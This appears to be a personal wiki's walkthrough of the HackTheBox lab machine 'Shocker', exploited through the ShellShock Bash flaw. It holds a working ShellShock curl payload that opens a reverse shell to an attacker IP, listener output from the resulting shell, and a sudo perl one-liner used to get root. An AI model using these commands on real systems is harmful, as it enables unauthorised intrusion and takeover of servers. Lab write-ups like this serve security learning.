Write-ups/HTB/Shocker

From Wiki Aghanim
Jump to navigationJump to search
Shocker
Platform HackTheBox
OS Linux
Difficulty Easy
Techniques ShellShock


This is rated an easy box, and for good reason, however, I spent a good amount of time just enumerating because the initial access was hidden well. For some who have encountered this vulnerability before, this would be a piece of cake, but I had never encountered ShellShock before so I spent a lot of time enumerating. Rooting this box was as simple as one command.



Enumeration

I'll start off with a nmap scan to get an idea of whats running on the machine. 


└─# nmap -sC -sV 10.10.10.56 -oN nmap.result
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 16:45 EST
Nmap scan report for 10.10.10.56
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.58 seconds


Only two ports, 80 and 2222. OpenSSH is using an uncommon port. That however leads no way, so it will be ignored in the remainder of this writeup.


Vising the webserver we are welcomed by this page. A very simple page with not much content. 




Don't Bug Me!


Using gobuster to find hidden directories. 


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/12 14:31:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]

===============================================================
2022/01/12 14:31:52 Finished
===============================================================


Nothing noteworthy. After alot of enumeration I started looking at /cgi-bin/. After some googling I found this.


> ShellShock

Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an attacker can tack-on malicious code to the environment variable, which will run once the variable is received. https://book.hacktricks.xyz/pentesting/pentesting-web/cgi


> How Does ShellShock Work?

In layman’s terms, Shellshock is a vulnerability that allows systems containing a vulnerable version of Bash to be exploited to execute commands with higher privileges. This allows attackers to potentially take over that system. https://securityintelligence.com/articles/shellshock-vulnerability-in-depth/


So after reading this I editied my gobuster dir search and find a file, user.sh. 


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x cgi,sh,jpg,txt,html,php -b 403,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              cgi,sh,jpg,txt,html,php
[+] Timeout:                 10s
===============================================================
2022/01/12 14:45:13 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 118]

===============================================================
2022/01/12 14:47:05 Finished
===============================================================


And reading the file. 


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# cat user.sh
Content-Type: text/plain

Just an uptime test script

 14:07:18 up 21:24,  0 users,  load average: 0.19, 0.09, 0.03


Initial Access

As we mentioned earlier, the server is vulnerable to ShellShock which is a vulnerability in Bash which would allow us to execute arbitrary commands and gain remote shell on the machine. 


curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.10.17/4444 0>&1' http://10.10.10.56/cgi-bin/



┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.56] 42834
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ ls
ls
user.sh
shelly@Shocker:/usr/lib/cgi-bin$ pwd
pwd
/usr/lib/cgi-bin
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$


Root

Getting root on this was extremly easy. After doing the usual enumeration I found that the user Shelly could run perl as sudo.


shelly@Shocker:/$ sudo -l Matching Defaults entries for shelly on Shocker: 

   env_reset, mail_badpass,
   secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker: 

   (root) NOPASSWD: /usr/bin/perl

shelly@Shocker:/$ sudo perl -e 'exec "/bin/sh";'

  1. id

uid=0(root) gid=0(root) groups=0(root)

Retrieved from "https://book.ghanim.no/index.php?title=Write-ups/HTB/Shocker&oldid=1175"